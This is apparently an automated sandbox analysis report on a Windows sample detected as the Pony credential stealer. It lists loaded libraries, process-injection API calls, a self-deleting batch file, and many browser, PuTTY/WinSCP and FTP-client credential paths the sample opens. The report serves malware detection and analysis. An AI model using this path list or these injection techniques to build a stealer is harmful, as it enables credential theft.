          Source: C:\Users\user\Desktop\AxgZVzUv8m.exeSection loaded: apphelp.dllJump to behavior
          Source: C:\Users\user\Desktop\AxgZVzUv8m.exeSection loaded: kernel.appcore.dllJump to behavior
          Source: C:\Users\user\Desktop\AxgZVzUv8m.exeSection loaded: version.dllJump to behavior
          Source: C:\Users\user\Desktop\AxgZVzUv8m.exeSection loaded: windows.storage.dllJump to behavior
          Source: C:\Users\user\Desktop\AxgZVzUv8m.exeSection loaded: wldp.dllJump to behavior
          Source: C:\Users\user\Desktop\AxgZVzUv8m.exeSection loaded: profapi.dllJump to behavior
          Source: C:\Users\user\Desktop\AxgZVzUv8m.exeSection loaded: uxtheme.dllJump to behavior
          Source: C:\Users\user\Desktop\AxgZVzUv8m.exeSection loaded: dwrite.dllJump to behavior
          Source: C:\Users\user\Desktop\AxgZVzUv8m.exeSection loaded: riched20.dllJump to behavior
          Source: C:\Users\user\Desktop\AxgZVzUv8m.exeSection loaded: usp10.dllJump to behavior
          Source: C:\Users\user\Desktop\AxgZVzUv8m.exeSection loaded: msls31.dllJump to behavior
          Source: C:\Users\user\Desktop\AxgZVzUv8m.exeSection loaded: shfolder.dllJump to behavior
          Source: C:\Users\user\Desktop\AxgZVzUv8m.exeSection loaded: userenv.dllJump to behavior
          Source: C:\Users\user\Desktop\AxgZVzUv8m.exeSection loaded: wininet.dllJump to behavior
          Source: C:\Users\user\Desktop\AxgZVzUv8m.exeSection loaded: wsock32.dllJump to behavior
          Source: C:\Users\user\Desktop\AxgZVzUv8m.exeSection loaded: kernel.appcore.dllJump to behavior
          Source: C:\Users\user\Desktop\AxgZVzUv8m.exeSection loaded: uxtheme.dllJump to behavior
          Source: C:\Users\user\Desktop\AxgZVzUv8m.exeSection loaded: netapi32.dllJump to behavior
          Source: C:\Users\user\Desktop\AxgZVzUv8m.exeSection loaded: netutils.dllJump to behavior
          Source: C:\Users\user\Desktop\AxgZVzUv8m.exeSection loaded: samcli.dllJump to behavior
          Source: C:\Users\user\Desktop\AxgZVzUv8m.exeSection loaded: msi.dllJump to behavior
          Source: C:\Users\user\Desktop\AxgZVzUv8m.exeSection loaded: pstorec.dllJump to behavior
          Source: C:\Users\user\Desktop\AxgZVzUv8m.exeSection loaded: sspicli.dllJump to behavior
          Source: C:\Users\user\Desktop\AxgZVzUv8m.exeSection loaded: windows.storage.dllJump to behavior
          Source: C:\Users\user\Desktop\AxgZVzUv8m.exeSection loaded: wldp.dllJump to behavior
          Source: C:\Users\user\Desktop\AxgZVzUv8m.exeSection loaded: profapi.dllJump to behavior
          Source: C:\Users\user\Desktop\AxgZVzUv8m.exeSection loaded: ieframe.dllJump to behavior
          Source: C:\Users\user\Desktop\AxgZVzUv8m.exeSection loaded: iertutil.dllJump to behavior
          Source: C:\Users\user\Desktop\AxgZVzUv8m.exeSection loaded: version.dllJump to behavior
          Source: C:\Users\user\Desktop\AxgZVzUv8m.exeSection loaded: winhttp.dllJump to behavior
          Source: C:\Users\user\Desktop\AxgZVzUv8m.exeSection loaded: wkscli.dllJump to behavior
          Source: C:\Users\user\Desktop\AxgZVzUv8m.exeSection loaded: secur32.dllJump to behavior
          Source: C:\Users\user\Desktop\AxgZVzUv8m.exeSection loaded: mlang.dllJump to behavior
          Source: C:\Users\user\Desktop\AxgZVzUv8m.exeSection loaded: propsys.dllJump to behavior
          Source: C:\Users\user\Desktop\AxgZVzUv8m.exeSection loaded: mswsock.dllJump to behavior
          Source: C:\Users\user\Desktop\AxgZVzUv8m.exeSection loaded: napinsp.dllJump to behavior
          Source: C:\Users\user\Desktop\AxgZVzUv8m.exeSection loaded: pnrpnsp.dllJump to behavior
          Source: C:\Users\user\Desktop\AxgZVzUv8m.exeSection loaded: wshbth.dllJump to behavior
          Source: C:\Users\user\Desktop\AxgZVzUv8m.exeSection loaded: nlaapi.dllJump to behavior
          Source: C:\Users\user\Desktop\AxgZVzUv8m.exeSection loaded: iphlpapi.dllJump to behavior
          Source: C:\Users\user\Desktop\AxgZVzUv8m.exeSection loaded: dnsapi.dllJump to behavior
          Source: C:\Users\user\Desktop\AxgZVzUv8m.exeSection loaded: winrnr.dllJump to behavior
          Source: C:\Users\user\Desktop\AxgZVzUv8m.exeSection loaded: fwpuclnt.dllJump to behavior
          Source: C:\Users\user\Desktop\AxgZVzUv8m.exeSection loaded: rasadhlp.dllJump to behavior
          Source: C:\Users\user\Desktop\AxgZVzUv8m.exeSection loaded: samlib.dllJump to behavior
          Source: C:\Users\user\Desktop\AxgZVzUv8m.exeSection loaded: edputil.dllJump to behavior
          Source: C:\Users\user\Desktop\AxgZVzUv8m.exeSection loaded: urlmon.dllJump to behavior
          Source: C:\Users\user\Desktop\AxgZVzUv8m.exeSection loaded: srvcli.dllJump to behavior
          Source: C:\Users\user\Desktop\AxgZVzUv8m.exeSection loaded: windows.staterepositoryps.dllJump to behavior
          Source: C:\Users\user\Desktop\AxgZVzUv8m.exeSection loaded: wintypes.dllJump to behavior
          Source: C:\Users\user\Desktop\AxgZVzUv8m.exeSection loaded: appresolver.dllJump to behavior
          Source: C:\Users\user\Desktop\AxgZVzUv8m.exeSection loaded: bcp47langs.dllJump to behavior
          Source: C:\Users\user\Desktop\AxgZVzUv8m.exeSection loaded: slc.dllJump to behavior
          Source: C:\Users\user\Desktop\AxgZVzUv8m.exeSection loaded: sppc.dllJump to behavior
          Source: C:\Users\user\Desktop\AxgZVzUv8m.exeSection loaded: onecorecommonproxystub.dllJump to behavior
          Source: C:\Users\user\Desktop\AxgZVzUv8m.exeSection loaded: onecoreuapcommonproxystub.dllJump to behavior
          Source: C:\Windows\SysWOW64\cmd.exeSection loaded: cmdext.dllJump to behavior
          Source: C:\Users\user\Desktop\AxgZVzUv8m.exeKey value queried: HKEY_LOCAL_MACHINE\SOFTWARE\Classes\WOW6432Node\CLSID\{3C374A40-BAE4-11CF-BF7D-00AA006946EE}\InProcServer32Jump to behavior
          Source: C:\Users\user\Desktop\AxgZVzUv8m.exeKey opened: HKEY_CURRENT_USER\Software\Microsoft\Office\Outlook\OMI Account Manager\AccountsJump to behavior
          Source: AxgZVzUv8m.exeStatic PE information: data directory type: IMAGE_DIRECTORY_ENTRY_COM_DESCRIPTOR
          Source: C:\Users\user\Desktop\AxgZVzUv8m.exeFile opened: C:\Windows\WinSxS\x86_microsoft.vc80.crt_1fc8b3b9a1e18e3b_8.0.50727.9672_none_d08f9da24428a513\MSVCR80.dllJump to behavior
          Source: AxgZVzUv8m.exeStatic PE information: DYNAMIC_BASE, NX_COMPAT, NO_SEH, TERMINAL_SERVER_AWARE
          Source: Binary string: G:\Projects\DLL3\DLL3\obj\Release\Dll.pdb source: AxgZVzUv8m.exe, 00000000.00000002.1594363293.0000000006990000.00000004.08000000.00040000.00000000.sdmp

          Data Obfuscation

          barindex
          .NET source code contains potential unpacker
          Source: AxgZVzUv8m.exe, u9lljp7Y7HXWgkndHZQxcfD.cs.Net Code: Main System.AppDomain.Load(byte[])
          Yara detected aPLib compressed binary
          Source: Yara matchFile source: 3.2.AxgZVzUv8m.exe.400000.0.unpack, type: UNPACKEDPE
          Source: Yara matchFile source: 3.2.AxgZVzUv8m.exe.400000.0.raw.unpack, type: UNPACKEDPE
          Source: Yara matchFile source: 00000003.00000002.1644343823.0000000000400000.00000040.00000400.00020000.00000000.sdmp, type: MEMORY
          Source: Yara matchFile source: Process Memory Space: AxgZVzUv8m.exe PID: 2744, type: MEMORYSTR
          Source: C:\Users\user\Desktop\AxgZVzUv8m.exeCode function: 3_2_00410065 GetTickCount,wsprintfA,GetModuleFileNameA,GetTempPathA,lstrcat,ExitProcess,CreateFileA,lstrcpy,StrRChrIA,lstrcpy,ExitProcess,lstrlen,CloseHandle,wsprintfA,LoadLibraryA,GetProcAddress,ShellExecuteA,3_2_00410065
          Source: C:\Users\user\Desktop\AxgZVzUv8m.exeCode function: 3_2_00419968 push eax; ret 3_2_00419977
          Source: C:\Users\user\Desktop\AxgZVzUv8m.exeCode function: 3_2_00419BD9 pushfd ; iretd 3_2_00419C21
          Source: AxgZVzUv8m.exeStatic PE information: section name: .text entropy: 7.65846150249695
          Source: AxgZVzUv8m.exe, u9lljp7Y7HXWgkndHZQxcfD.csHigh entropy of concatenated method names: 'ho5X5G', 'svOSV', 'dXXuETrOqCXcXUN8', 'VkjCGKA3mdUyBZyDT', 'pCp0VVT', 'xUhE1Es3efdj0S1BQP8eh', 'kzrNtUB', 'Ui30TgcDkwD', 'AI6EK0dC', 'Vc6lFW57jKEegS0nxkWQ'

          Hooking and other Techniques for Hiding and Protection

          barindex
          Drops / launches Pony Loader self-deletion script - malware possibly based on Pony Loader leaked source code
          Source: C:\Users\user\Desktop\AxgZVzUv8m.exeFile dump: 7041625.bat.3.dr 3880EEB1C736D853EB13B44898B718ABJump to dropped file
          Source: C:\Users\user\Desktop\AxgZVzUv8m.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Users\user\Desktop\AxgZVzUv8m.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Users\user\Desktop\AxgZVzUv8m.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Users\user\Desktop\AxgZVzUv8m.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Users\user\Desktop\AxgZVzUv8m.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Users\user\Desktop\AxgZVzUv8m.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Users\user\Desktop\AxgZVzUv8m.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Users\user\Desktop\AxgZVzUv8m.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Users\user\Desktop\AxgZVzUv8m.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Users\user\Desktop\AxgZVzUv8m.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Users\user\Desktop\AxgZVzUv8m.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Users\user\Desktop\AxgZVzUv8m.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Users\user\Desktop\AxgZVzUv8m.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Users\user\Desktop\AxgZVzUv8m.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Users\user\Desktop\AxgZVzUv8m.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Users\user\Desktop\AxgZVzUv8m.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Users\user\Desktop\AxgZVzUv8m.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Users\user\Desktop\AxgZVzUv8m.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Users\user\Desktop\AxgZVzUv8m.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Users\user\Desktop\AxgZVzUv8m.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Users\user\Desktop\AxgZVzUv8m.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Users\user\Desktop\AxgZVzUv8m.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Users\user\Desktop\AxgZVzUv8m.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Users\user\Desktop\AxgZVzUv8m.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Users\user\Desktop\AxgZVzUv8m.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Users\user\Desktop\AxgZVzUv8m.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Users\user\Desktop\AxgZVzUv8m.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Users\user\Desktop\AxgZVzUv8m.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Users\user\Desktop\AxgZVzUv8m.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Users\user\Desktop\AxgZVzUv8m.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Users\user\Desktop\AxgZVzUv8m.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Windows\SysWOW64\cmd.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Users\user\Desktop\AxgZVzUv8m.exeMemory allocated: A30000 memory reserve | memory write watchJump to behavior
          Source: C:\Users\user\Desktop\AxgZVzUv8m.exeMemory allocated: 26C0000 memory reserve | memory write watchJump to behavior
          Source: C:\Users\user\Desktop\AxgZVzUv8m.exeMemory allocated: 46C0000 memory commit | memory reserve | memory write watchJump to behavior
          Source: C:\Windows\System32\conhost.exeWindow / User API: threadDelayed 9583Jump to behavior
          Source: C:\Users\user\Desktop\AxgZVzUv8m.exeCode function: 3_2_004051E3 FindFirstFileA,lstrcmpiA,lstrcmpiA,FindNextFileA,FindClose,3_2_004051E3
          Source: C:\Users\user\Desktop\AxgZVzUv8m.exeCode function: 3_2_004041A6 FindFirstFileA,lstrcmpiA,lstrcmpiA,StrStrIA,FindNextFileA,FindClose,3_2_004041A6
          Source: C:\Users\user\Desktop\AxgZVzUv8m.exeCode function: 3_2_00404E73 FindFirstFileA,lstrcmpiA,lstrcmpiA,StrStrIA,StrStrIA,FindNextFileA,FindClose,3_2_00404E73
          Source: C:\Users\user\Desktop\AxgZVzUv8m.exeCode function: 3_2_00408AE5 FindFirstFileA,lstrcmpiA,lstrcmpiA,StrStrIA,FindNextFileA,FindClose,3_2_00408AE5
          Source: C:\Users\user\Desktop\AxgZVzUv8m.exeCode function: 3_2_00409832 FindFirstFileA,lstrcmpiA,lstrcmpiA,StrStrIA,StrStrIA,lstrlen,StrStrIA,StrStrIA,StrStrIA,FindNextFileA,FindClose,3_2_00409832
          Source: C:\Users\user\Desktop\AxgZVzUv8m.exeCode function: 3_2_00408961 FindFirstFileA,lstrcmpiA,lstrcmpiA,StrStrIA,FindNextFileA,FindClose,3_2_00408961
          Source: C:\Users\user\Desktop\AxgZVzUv8m.exeCode function: 3_2_004045FD GetVersionExA,GetLocaleInfoA,GetLocaleInfoA,GetModuleHandleA,GetProcAddress,GetNativeSystemInfo,GetSystemInfo,3_2_004045FD
          Source: C:\Users\user\Desktop\AxgZVzUv8m.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Extensions\nmmhkkegccagdldgiimedpiccmgmieda\1.0.0.6_0\images\Jump to behavior
          Source: C:\Users\user\Desktop\AxgZVzUv8m.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Extensions\nmmhkkegccagdldgiimedpiccmgmieda\1.0.0.6_0\css\Jump to behavior
          Source: C:\Users\user\Desktop\AxgZVzUv8m.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Extensions\nmmhkkegccagdldgiimedpiccmgmieda\1.0.0.6_0\_locales\bg\Jump to behavior
          Source: C:\Users\user\Desktop\AxgZVzUv8m.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Extensions\nmmhkkegccagdldgiimedpiccmgmieda\1.0.0.6_0\Jump to behavior
          Source: C:\Users\user\Desktop\AxgZVzUv8m.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Extensions\nmmhkkegccagdldgiimedpiccmgmieda\1.0.0.6_0\_locales\Jump to behavior
          Source: C:\Users\user\Desktop\AxgZVzUv8m.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Extensions\nmmhkkegccagdldgiimedpiccmgmieda\1.0.0.6_0\html\Jump to behavior
          Source: AxgZVzUv8m.exe, 00000003.00000002.1644544434.0000000000D17000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: \??\SCSI#CdRom&Ven_NECVMWar&Prod_VMware_SATA_CD00#4&224f42ef&0&000000#{53f5630d-b6bf-11d0-94f2-00a0c91efb8b}y
          Source: AxgZVzUv8m.exe, 00000003.00000002.1644544434.0000000000D17000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: Hyper-V RAW%SystemRoot%\system32\mswsock.dll
          Source: C:\Users\user\Desktop\AxgZVzUv8m.exeAPI call chain: ExitProcess graph end nodegraph_3-8791
          Source: C:\Users\user\Desktop\AxgZVzUv8m.exeAPI call chain: ExitProcess graph end nodegraph_3-8652
          Source: C:\Users\user\Desktop\AxgZVzUv8m.exeAPI call chain: ExitProcess graph end nodegraph_3-8442
          Source: C:\Users\user\Desktop\AxgZVzUv8m.exeProcess information queried: ProcessInformationJump to behavior
          Source: C:\Users\user\Desktop\AxgZVzUv8m.exeCode function: 3_2_00410065 GetTickCount,wsprintfA,GetModuleFileNameA,GetTempPathA,lstrcat,ExitProcess,CreateFileA,lstrcpy,StrRChrIA,lstrcpy,ExitProcess,lstrlen,CloseHandle,wsprintfA,LoadLibraryA,GetProcAddress,ShellExecuteA,3_2_00410065
          Source: C:\Users\user\Desktop\AxgZVzUv8m.exeCode function: 3_2_0040F984 mov eax, dword ptr fs:[00000030h]3_2_0040F984
          Source: C:\Users\user\Desktop\AxgZVzUv8m.exeProcess token adjusted: DebugJump to behavior
          Source: C:\Users\user\Desktop\AxgZVzUv8m.exeCode function: 3_2_004105D6 SetUnhandledExceptionFilter,RevertToSelf,3_2_004105D6
          Source: C:\Users\user\Desktop\AxgZVzUv8m.exeMemory allocated: page read and write | page guardJump to behavior

          HIPS / PFW / Operating System Protection Evasion

          barindex
          .NET source code references suspicious native API functions
          Source: 0.2.AxgZVzUv8m.exe.6990000.1.raw.unpack, RunPE.csReference to suspicious API methods: ReadProcessMemory(processInformation.ProcessHandle, num3 + 8, ref buffer, 4, ref bytesRead)
          Source: 0.2.AxgZVzUv8m.exe.6990000.1.raw.unpack, RunPE.csReference to suspicious API methods: VirtualAllocEx(processInformation.ProcessHandle, num2, length, 12288, 64)
          Source: 0.2.AxgZVzUv8m.exe.6990000.1.raw.unpack, RunPE.csReference to suspicious API methods: WriteProcessMemory(processInformation.ProcessHandle, num4, data, bufferSize, ref bytesRead)
          Injects a PE file into a foreign processes
          Source: C:\Users\user\Desktop\AxgZVzUv8m.exeMemory written: C:\Users\user\Desktop\AxgZVzUv8m.exe base: 400000 value starts with: 4D5AJump to behavior
          Source: C:\Users\user\Desktop\AxgZVzUv8m.exeCode function: 3_2_0041032D lstrcmpiA,LogonUserA,lstrlen,LCMapStringA,LogonUserA,LogonUserA,741D1B10,ImpersonateLoggedOnUser,RevertToSelf,CloseHandle,3_2_0041032D
          Source: C:\Users\user\Desktop\AxgZVzUv8m.exeProcess created: C:\Users\user\Desktop\AxgZVzUv8m.exe "C:\Users\user\Desktop\AxgZVzUv8m.exe"Jump to behavior
          Source: C:\Users\user\Desktop\AxgZVzUv8m.exeProcess created: C:\Windows\SysWOW64\cmd.exe C:\Windows\system32\cmd.exe /c ""C:\Users\user\AppData\Local\Temp\7041625.bat" "C:\Users\user\Desktop\AxgZVzUv8m.exe" "Jump to behavior
          Source: C:\Users\user\Desktop\AxgZVzUv8m.exeCode function: 3_2_004044D2 AllocateAndInitializeSid,CheckTokenMembership,FreeSid,3_2_004044D2
          Source: C:\Users\user\Desktop\AxgZVzUv8m.exeCode function: GetVersionExA,GetLocaleInfoA,GetLocaleInfoA,GetModuleHandleA,GetProcAddress,GetNativeSystemInfo,GetSystemInfo,3_2_004045FD
          Source: C:\Users\user\Desktop\AxgZVzUv8m.exeQueries volume information: C:\Windows\Fonts\micross.ttf VolumeInformationJump to behavior
          Source: C:\Users\user\Desktop\AxgZVzUv8m.exeCode function: 3_2_0041051E OleInitialize,GetUserNameA,3_2_0041051E
          Source: C:\Users\user\Desktop\AxgZVzUv8m.exeCode function: 3_2_004045FD GetVersionExA,GetLocaleInfoA,GetLocaleInfoA,GetModuleHandleA,GetProcAddress,GetNativeSystemInfo,GetSystemInfo,3_2_004045FD

          Stealing of Sensitive Information

          barindex
          Yara detected Pony
          Source: Yara matchFile source: 3.2.AxgZVzUv8m.exe.400000.0.unpack, type: UNPACKEDPE
          Source: Yara matchFile source: 3.2.AxgZVzUv8m.exe.400000.0.raw.unpack, type: UNPACKEDPE
          Source: Yara matchFile source: 00000003.00000002.1644343823.0000000000400000.00000040.00000400.00020000.00000000.sdmp, type: MEMORY
          Source: Yara matchFile source: Process Memory Space: AxgZVzUv8m.exe PID: 2744, type: MEMORYSTR
          Tries to harvest and steal Putty / WinSCP information (sessions, passwords, etc)
          Source: C:\Users\user\Desktop\AxgZVzUv8m.exeKey opened: HKEY_CURRENT_USER\Software\Martin PrikrylJump to behavior
          Tries to harvest and steal browser information (history, passwords, etc)
          Source: C:\Users\user\Desktop\AxgZVzUv8m.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Login Data For Account-journalJump to behavior
          Source: C:\Users\user\Desktop\AxgZVzUv8m.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Web DataJump to behavior
          Source: C:\Users\user\Desktop\AxgZVzUv8m.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Login Data-journalJump to behavior
          Source: C:\Users\user\Desktop\AxgZVzUv8m.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Login DataJump to behavior
          Source: C:\Users\user\Desktop\AxgZVzUv8m.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Login Data For AccountJump to behavior
          Source: C:\Users\user\Desktop\AxgZVzUv8m.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Web Data-journalJump to behavior
          Tries to harvest and steal ftp login credentials
          Source: C:\Users\user\Desktop\AxgZVzUv8m.exeFile opened: C:\Users\user\AppData\Local\RhinoSoft.com\Jump to behavior
          Source: C:\Users\user\Desktop\AxgZVzUv8m.exeFile opened: C:\Users\user\AppData\Roaming\SharedSettings.ccsJump to behavior
          Source: C:\Users\user\Desktop\AxgZVzUv8m.exeFile opened: C:\Users\user\AppData\Roaming\SharedSettings.sqliteJump to behavior
          Source: C:\Users\user\Desktop\AxgZVzUv8m.exeFile opened: C:\Users\user\AppData\Roaming\LeapWare\LeapFTP\Jump to behavior
          Source: C:\Users\user\Desktop\AxgZVzUv8m.exeFile opened: HKEY_CURRENT_USER\Software\Far2\Plugins\FTP\HostsJump to behavior
          Source: C:\Users\user\Desktop\AxgZVzUv8m.exeFile opened: C:\ProgramData\SiteDesigner\Jump to behavior
          Source: C:\Users\user\Desktop\AxgZVzUv8m.exeFile opened: C:\Users\user\AppData\Local\CoffeeCup Software\SharedSettings_1_0_5.ccsJump to behavior
          Source: C:\Users\user\Desktop\AxgZVzUv8m.exeFile opened: C:\ProgramData\SharedSettings_1_0_5.ccsJump to behavior
          Source: C:\Users\user\Desktop\AxgZVzUv8m.exeFile opened: HKEY_CURRENT_USER\Software\GlobalSCAPE\CuteFTP 7 Home\QCToolbarJump to behavior
          Source: C:\Users\user\Desktop\AxgZVzUv8m.exeFile opened: C:\Users\user\AppData\Local\GPSoftware\Directory Opus\Jump to behavior
          Source: C:\Users\user\Desktop\AxgZVzUv8m.exeFile opened: C:\Users\user\AppData\Local\CuteFTP\Jump to behavior
          Source: C:\Users\user\Desktop\AxgZVzUv8m.exeFile opened: C:\Users\user\AppData\Roaming\CoffeeCup Software\SharedSettings_1_0_5.ccsJump to behavior
          Source: C:\Users\user\Desktop\AxgZVzUv8m.exeFile opened: C:\Program Files (x86)\GlobalSCAPE\CuteFTP Pro\Jump to behavior
          Source: C:\Users\user\Desktop\AxgZVzUv8m.exeFile opened: C:\Users\user\AppData\Local\FileZilla\sitemanager.xmlJump to behavior
          Source: C:\Users\user\Desktop\AxgZVzUv8m.exeFile opened: C:\Users\user\AppData\Roaming\SharedSettings_1_0_5.sqliteJump to behavior
          Source: C:\Users\user\Desktop\AxgZVzUv8m.exeFile opened: C:\Users\user\AppData\Roaming\FlashFXP\4\History.datJump to behavior
          Source: C:\Users\user\Desktop\AxgZVzUv8m.exeFile opened: C:\ProgramData\RhinoSoft.com\Jump to behavior
          Source: C:\Users\user\Desktop\AxgZVzUv8m.exeFile opened: HKEY_CURRENT_USER\Software\GlobalSCAPE\CuteFTP 6 Professional\QCToolbarJump to behavior
          Source: C:\Users\user\Desktop\AxgZVzUv8m.exeFile opened: C:\Users\user\AppData\Roaming\FlashFXP\3\History.datJump to behavior
          Source: C:\Users\user\Desktop\AxgZVzUv8m.exeFile opened: C:\Users\user\AppData\Roaming\CoffeeCup Software\SharedSettings.sqliteJump to behavior
          Source: C:\Users\user\Desktop\AxgZVzUv8m.exeFile opened: C:\Users\user\AppData\Roaming\FileZilla\filezilla.xmlJump to behavior
          Source: C:\Users\user\Desktop\AxgZVzUv8m.exeFile opened: HKEY_CURRENT_USER\Software\TurboFTPJump to behavior
          Source: C:\Users\user\Desktop\AxgZVzUv8m.exeFile opened: C:\Users\user\AppData\Roaming\GlobalSCAPE\CuteFTP Lite\sm.datJump to behavior
          Source: C:\Users\user\Desktop\AxgZVzUv8m.exeFile opened: C:\Users\user\AppData\Local\FlashFXP\3\History.datJump to behavior
          Source: C:\Users\user\Desktop\AxgZVzUv8m.exeFile opened: C:\Users\user\AppData\Local\FlashFXP\4\History.datJump to behavior
          Source: C:\Users\user\Desktop\AxgZVzUv8m.exeFile opened: HKEY_LOCAL_MACHINE\Software\WOW6432Node\AceBITJump to behavior
          Source: C:\Users\user\Desktop\AxgZVzUv8m.exeFile opened: C:\Users\user\AppData\Local\CoffeeCup Software\SharedSettings.ccsJump to behavior
          Source: C:\Users\user\Desktop\AxgZVzUv8m.exeFile opened: C:\Users\user\AppData\Local\GlobalSCAPE\CuteFTP Lite\Jump to behavior
          Source: C:\Users\user\Desktop\AxgZVzUv8m.exeFile opened: C:\ProgramData\LeapWare\LeapFTP\Jump to behavior
          Source: C:\Users\user\Desktop\AxgZVzUv8m.exeFile opened: C:\Users\user\AppData\Local\INSoftware\NovaFTP\Jump to behavior
          Source: C:\Users\user\Desktop\AxgZVzUv8m.exeFile opened: C:\ProgramData\GPSoftware\Directory Opus\Jump to behavior
          Source: C:\Users\user\Desktop\AxgZVzUv8m.exeFile opened: C:\Users\user\AppData\Local\FlashFXP\4\Sites.datJump to behavior
          Source: C:\Users\user\Desktop\AxgZVzUv8m.exeFile opened: C:\Users\user\AppData\Local\SharedSettings_1_0_5.sqliteJump to behavior
          Source: C:\Users\user\Desktop\AxgZVzUv8m.exeFile opened: C:\Users\user\AppData\Roaming\FTPRush\Jump to behavior
          Source: C:\Users\user\Desktop\AxgZVzUv8m.exeFile opened: C:\Users\user\AppData\Roaming\AceBIT\Jump to behavior
          Source: C:\Users\user\Desktop\AxgZVzUv8m.exeFile opened: C:\Users\user\AppData\Local\GlobalSCAPE\CuteFTP\sm.datJump to behavior
          Source: C:\Users\user\Desktop\AxgZVzUv8m.exeFile opened: C:\Users\user\AppData\Roaming\CoffeeCup Software\SharedSettings_1_0_5.sqliteJump to behavior
          Source: C:\Users\user\Desktop\AxgZVzUv8m.exeFile opened: C:\Users\user\AppData\Local\GlobalSCAPE\CuteFTP\Jump to behavior
          Source: C:\Users\user\Desktop\AxgZVzUv8m.exeFile opened: C:\Users\user\AppData\Local\FTPGetter\Jump to behavior
          Source: C:\Users\user\Desktop\AxgZVzUv8m.exeFile opened: HKEY_CURRENT_USER\Software\AceBITJump to behavior
          Source: C:\Users\user\Desktop\AxgZVzUv8m.exeFile opened: C:\Users\user\AppData\Local\SharedSettings.sqliteJump to behavior
          Source: C:\Users\user\Desktop\AxgZVzUv8m.exeFile opened: C:\ProgramData\FTPInfo\Jump to behavior
          Source: C:\Users\user\Desktop\AxgZVzUv8m.exeFile opened: C:\Users\user\AppData\Local\FileZilla\recentservers.xmlJump to behavior
          Source: C:\Users\user\Desktop\AxgZVzUv8m.exeFile opened: C:\ProgramData\FileZilla\filezilla.xmlJump to behavior
          Source: C:\Users\user\Desktop\AxgZVzUv8m.exeFile opened: C:\ProgramData\CoffeeCup Software\SharedSettings.ccsJump to behavior
          Source: C:\Users\user\Desktop\AxgZVzUv8m.exeFile opened: C:\ProgramData\BitKinex\Jump to behavior
          Source: C:\Users\user\Desktop\AxgZVzUv8m.exeFile opened: C:\ProgramData\GlobalSCAPE\CuteFTP Lite\Jump to behavior
          Source: C:\Users\user\Desktop\AxgZVzUv8m.exeFile opened: C:\ProgramData\SharedSettings_1_0_5.sqliteJump to behavior
          Source: C:\Users\user\Desktop\AxgZVzUv8m.exeFile opened: C:\Program Files (x86)\CuteFTP\Jump to behavior
          Source: C:\Users\user\Desktop\AxgZVzUv8m.exeFile opened: C:\ProgramData\SharedSettings.ccsJump to behavior
          Source: C:\Users\user\Desktop\AxgZVzUv8m.exeFile opened: C:\Users\user\AppData\Local\GlobalSCAPE\CuteFTP Lite\sm.datJump to behavior
          Source: C:\Users\user\Desktop\AxgZVzUv8m.exeFile opened: HKEY_CURRENT_USER\Software\FlashPeak\BlazeFtp\SettingsJump to behavior
          Source: C:\Users\user\Desktop\AxgZVzUv8m.exeFile opened: C:\Users\user\AppData\Roaming\GHISLER\wcx_ftp.iniJump to behavior
          Source: C:\Users\user\Desktop\AxgZVzUv8m.exeFile opened: C:\ProgramData\GHISLER\wcx_ftp.iniJump to behavior
          Source: C:\Users\user\Desktop\AxgZVzUv8m.exeFile opened: C:\ProgramData\FileZilla\recentservers.xmlJump to behavior
          Source: C:\Users\user\Desktop\AxgZVzUv8m.exeFile opened: C:\ProgramData\BlazeFtp\Jump to behavior
          Source: C:\Users\user\Desktop\AxgZVzUv8m.exeFile opened: C:\ProgramData\FlashFXP\4\Sites.datJump to behavior
